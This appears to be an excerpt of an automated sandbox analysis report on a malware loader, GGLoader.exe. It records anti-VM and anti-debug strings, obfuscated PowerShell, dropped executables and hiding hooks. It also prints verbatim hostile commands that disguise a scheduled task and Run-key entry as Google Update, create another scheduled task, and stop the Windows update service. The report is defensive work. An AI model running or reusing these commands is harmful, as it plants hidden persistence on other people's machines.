Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Source: GGLoader.exeString found in binary or memory: dotNetProtector
                        Source: GGLoader.exeString found in binary or memory: Form200Form210Form220Form230Form240Form250Form260Form270Form280Form290Form201Form211Form221Form231Form241Form251Form261Form271Form281Form291D1Form202Form212Form222Form232Form242Form252Form262Form272Form282Form292Form203Form213Form223Form233Form243Form253Form263Form273Form283Form293Form204Form214Form224Form234Form244Form254Form264Form274Form284Form294Form205Form215Form225Form235Form245Form255Form265Form275Form285Form295Form206Form216Form226Form236Form246Form256Form266Form276Form286Form296Form207Form217Form227Form237Form247Form257Form267Form277Form287Form297Form208Form218Form228Form238Form248Form258Form268Form278Form288Form298get_UTF8Form209Form219Form229Form239Form249Form259Form269Form279Form289Form299<Module>mscorlibThreadget_IsAttachedIsEmulatedNetGuardIDisposableget_HandleGetModuleHandleCloseHandleset_WindowStyleProcessWindowStyleset_FileNameDisposeBabelAttributeSuppressIldasmAttributeYanoAttributeDotfuscatorAttributeCompilationRelaxationsAttributeConfusedByAttributeRuntimeCompatibilityAttributeD1.exeSystem.ThreadingEncodingFromBase64StringToStringGetStringObfuscatedByGoliathAntiVMCheckAntiDebugCheckkernel32.dllget_ItemSystemMainManagementObjectCollectionExceptionProcessStartInfoZeroSleepDebuggerManagementObjectSearcherToLowerManagementObjectEnumeratorGetEnumerator.ctor.cctordotNetProtectorIntPtrSystem.DiagnosticsSystem.Runtime.CompilerServicesContainsGetCurrentProcessset_ArgumentsManagementBaseObjectGetop_ExplicitExitToUpperInvariantSystem.ManagementEnvironmentget_CurrentIsModulePresentCheckRemoteDebuggerPresentIsDebuggerPresentget_TickCountStartConvertMoveNextSystem.Textset_CreateNoWindowCheckForVMwareAndVirtualBoxdmjzxop_Equalityop_InequalityESelect * from Win32_ComputerSystem
                        Obfuscated command line found
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
                        Suspicious powershell command line found
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:NGLbonfBsuNR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$QtvYIpWnFCFICq,[Parameter(Position=1)][Type]$hhlNOVEDYw)$dpttUeHYiSd=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+'yD'+'e'+'l'+[Char](101)+''+'g'+'at'+'e'+''+'T'+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+'ale'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dpttUeHYiSd.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+'ide'+'B'+'y'+'S'+''+'i'+''+[Char](103)+''+','+'P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$QtvYIpWnFCFICq).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+'n'+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$dpttUeHYiSd.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+'g'+[Char](44)+'N'+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$hhlNOVEDYw,$QtvYIpWnFCFICq).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $dpttUeHYiSd.CreateType();}$fxvCjurJEEUcT=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+'m'+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'W'+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'f'+'x'+''+[Char](118)+'C'+[Char](106)+''+'u'+''+[Char](
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:QgCYtqphZUyk{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MPiGGXNLyYxMMn,[Parameter(Position=1)][Type]$YKFTYMbQTB)$nMulMONdbgM=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[Char](100)+'D'+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'or'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+'S'+[Char](101)+''+'a'+''+[Char](108)+'ed,A'+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+''+'u'+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$nMulMONdbgM.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+'a'+''+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$MPiGGXNLyYxMMn).SetImplementationFlags(''+'R'+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$nMulMONdbgM.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'ot'+[Char](44)+'V'+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$YKFTYMbQTB,$MPiGGXNLyYxMMn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');Write-Output $nMulMONdbgM.CreateType();}$mrsNZvUsWJBnM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.d'+[Char](108)+'l')}).GetType('Mi'+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+'3'+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+'emr'+[Char](115)+''+[Char](78)+''+[Char](90)+''+'v'+''+[
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }Jump to behavior
                        Source: updater.exe.7.drStatic PE information: real checksum: 0x241e4c should be: 0x2471a6
                        Source: LicenseGet.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x36ca3
                        Source: LicCheck.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x49cdb
                        Source: GGLoader.exeStatic PE information: real checksum: 0x0 should be: 0x13d5e
                        Source: LicSend.exe.1.drStatic PE information: real checksum: 0x241e4c should be: 0x2471a6
                        Source: poduiwcd.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x2ec3f
                        Source: LicSend.exe.1.drStatic PE information: section name: .xdata
                        Source: updater.exe.7.drStatic PE information: section name: .xdata
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8A0942 push E95B44D0h; ret 1_2_00007FFD9B8A09C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9B8811C8 push E95B46C7h; ret 3_2_00007FFD9B881209
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5798 push ecx; ret 6_2_007A57AB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B76D2A5 pushad ; iretd 17_2_00007FFD9B76D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFD9B880E10 push eax; retf 17_2_00007FFD9B880E1D
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00C0D102 push cs; retf 35_2_00C0D103
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: 35_2_00BF5798 push ecx; ret 35_2_00BF57AB
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02F068E1 push eax; iretd 38_2_02F06949
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_02F067D9 push eax; retf 38_2_02F06809
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E5722B8 push rdx; retf 39_2_000002505E5722B9
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E5784FD push rcx; retf 003Fh39_2_000002505E5784FE
                        Source: C:\Windows\System32\conhost.exeCode function: 39_2_000002505E5A94FD push rcx; retf 003Fh39_2_000002505E5A94FE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAA3C0C push ds; retf 40_2_00007FFD9BAA3C3A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAA3BEC push ds; retf 40_2_00007FFD9BAA3C2A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAA7DDC push ss; iretd 40_2_00007FFD9BAA7DEA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BAA98CC pushad ; iretd 40_2_00007FFD9BAA98DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 40_2_00007FFD9BCC73A2 push E85F7F18h; ret 40_2_00007FFD9BCC73A9
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1922B8 push rdx; retf 41_2_000001C08C1922B9
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1984FD push rcx; retf 003Fh41_2_000001C08C1984FE
                        Source: C:\Windows\System32\conhost.exeCode function: 41_2_000001C08C1C94FD push rcx; retf 003Fh41_2_000001C08C1C94FE
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_00000213111994FD push rcx; retf 003Fh42_2_00000213111994FE
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC6222B8 push rdx; retf 43_2_00000225DC6222B9
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC6284FD push rcx; retf 003Fh43_2_00000225DC6284FE
                        Source: C:\Windows\System32\winlogon.exeCode function: 43_2_00000225DC6594FD push rcx; retf 003Fh43_2_00000225DC6594FE

                        Persistence and Installation Behavior

                        barindex
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicenseGet.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeFile created: C:\Users\user\AppData\Local\Temp\poduiwcd.tmpJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicCheck.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeFile created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeJump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\LicSend.exeJump to dropped file

                        Boot Survival

                        barindex
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Found hidden mapped module (file has been removed from disk)
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PODUIWCD.TMP
                        Hooks files or directories query functions (used to hide files and directories)
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Hooks processes query functions (used to hide processes)
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Hooks registry keys query functions (used to hide registry keys)
                        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
